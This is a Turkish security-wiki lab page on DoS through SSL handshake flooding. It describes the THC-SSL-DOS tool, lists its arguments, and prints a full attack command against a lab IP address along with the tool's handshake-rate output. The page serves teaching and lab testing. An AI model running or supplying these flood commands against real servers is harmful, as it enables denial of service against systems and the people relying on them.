SSL Flood Yöntemi ile DDOS Saldırısı

BGA Security Wiki sitesinden
Şuraya atla: kullan, ara

Amaç:

SSL bağlanma işleminin manipüle edilerek hedef sistemde DoS etkisinin oluşturulması.

Araç:

  • THC-SSL-DOS

Lab Senaryosu:

Secure Sockets Layer(SSL) protokolü, internet üzerinden güvenli veri iletişimi sağlayan bir protokoldür. Bir takım algoritmalar ile bağlantının şifreli bir şekilde sunucu ve istemcinin arasında taşınmasını sağlar.

THC-SSL-DOS ise SSL’in performansını doğrulamak için geliştirilmiş bir araçtır. Herhangi bir manipülasyona maruz kalmadan kurulmuş normal bir SSL bağlantısı, standart bir HTTP bağlantısından ortalama 15 kat daha fazla işlemci gücüne ihtiyaç duymaktadır. Bu durumun sonucunda ise sunucuya daha fazla iş düşeceği için daha çok kaynağa ihtiyaç duyacaktır. Bu durumdan yola çıkarak geliştirilen THC-SSL-DOS aracı istemci ile sunucu arasında oluşturduğu trafik ile sunucunun SSL isteklerine cevap verebilme performansını ölçmektedir. Cevap veremediği durumda ise servis dışı kalacaktır ve sistem down gözükecektir.

Aşağıdaki ekran alıntısında saldırını anatomisine ait bir görsel verilmiştir.

SSLflood.png


Genel olarak THC-SSL-DOS aracının kullanımı aşağıdaki gibidir.

  • -l 100 : Açılmak istenen bağlantı sayısını belirtmektedir.
  • 192.168.10.12 : Hedef IP adresi
  • 443 : SSL Portu
root@bga# thc-ssl-dos -l 100 192.168.100.12 443 --accept
  ______________ ___  _________
	\__	___/   |   \ \_   ___ \
  	|	| /    ~	\/	\  \/
  	|	| \    Y	/\ 	\____
  	|____|  \___|_  /  \______  /
                    \/      	\/
           http://www.thc.org

     	Twitter @hackerschoice

Greetingz: the french underground

Waiting for script kiddies to piss off................
The force is with those who read the source...
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 2 [2.90 h/s], 6 Conn, 0 Err
Handshakes 25 [22.42 h/s], 13 Conn, 0 Err
Handshakes 70 [43.97 h/s], 20 Conn, 0 Err
Handshakes 125 [56.51 h/s], 27 Conn, 0 Err
Handshakes 185 [62.09 h/s], 33 Conn, 0 Err
Handshakes 262 [74.56 h/s], 41 Conn, 0 Err
Handshakes 365 [104.93 h/s], 47 Conn, 0 Err
Handshakes 496 [131.23 h/s], 54 Conn, 0 Err